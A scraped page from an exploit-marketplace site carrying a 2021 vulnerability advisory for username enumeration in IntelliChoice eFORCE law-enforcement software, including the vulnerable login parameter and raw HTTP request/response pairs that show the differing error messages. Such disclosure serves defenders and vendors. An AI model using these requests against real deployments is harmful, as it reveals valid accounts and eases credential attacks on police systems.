0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
IntelliChoice eFORCE Software Suite 2.5.9 - Username Enumeration Vulnerability
[# Exploit Title: IntelliChoice eFORCE Software Suite 2.5.9 - Username Enumeration
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.eforcesoftware.com
IntelliChoice eFORCE Software Suite v2.5.9 Username Enumeration
Vendor: IntelliChoice, Inc.
Product web page: https://www.eforcesoftware.com
Affected version: 2.5.9.6
2.5.9.5
2.5.9.3
2.5.9.2
2.5.9.1
2.5.8.0
2.5.7.20
2.5.7.18
2.5.6.18
2.5.4.6
2.5.3.11
Summary: IntelliChoice is a United States software company that was
founded in 2003, and offers a software title called eFORCE Software
Suite. eFORCE Software Suite is law enforcement software, and includes
features such as case management, court management, crime scene management,
criminal database, dispatching, evidence management, field reporting,
scheduling, court management integration, certification management,
and incident mapping. With regards to system requirements, eFORCE
Software Suite is available as SaaS, Windows, iPhone, and iPad software.
Desc: The weakness is caused due to the login script and how it verifies
provided credentials. Attacker can use this weakness to enumerate valid
users on the affected application via 'ctl00$MainContent$UserName' POST
parameter.
Tested on: Microsoft-IIS/10.0
Microsoft-IIS/8.5
ASP.NET/4.0.30319
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5658
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5658.php
03.05.2021
--
Request/response for existent username:
---------------------------------------
POST /eFORCECommand/Account/Login.aspx HTTP/1.1
__LASTFOCUS:
__EVENTTARGET:
__EVENTARGUMENT:
__VIEWSTATE: Xxx
__VIEWSTATEGENERATOR: 4A5A1A0F
__EVENTVALIDATION: Xxx
ctl00$MainContent$UserName: eforce
ctl00$MainContent$Password: 123456
ctl00$MainContent$btnLogin.x: 20
ctl00$MainContent$btnLogin.y: 7
Response:
Invalid password entered for username eforce.
Request/response for non-existent username:
-------------------------------------------
POST /eFORCECommand/Account/Login.aspx HTTP/1.1
__LASTFOCUS:
__EVENTTARGET:
__EVENTARGUMENT:
__VIEWSTATE: Xxx
__VIEWSTATEGENERATOR: 4A5A1A0F
__EVENTVALIDATION: Xxx
ctl00$MainContent$UserName: testingus
ctl00$MainContent$Password: 123456
ctl00$MainContent$btnLogin.x: 20
ctl00$MainContent$btnLogin.y: 7
Response:
Unable to login: User name testingus is not registered.
# 0day.today [2024-11-15] #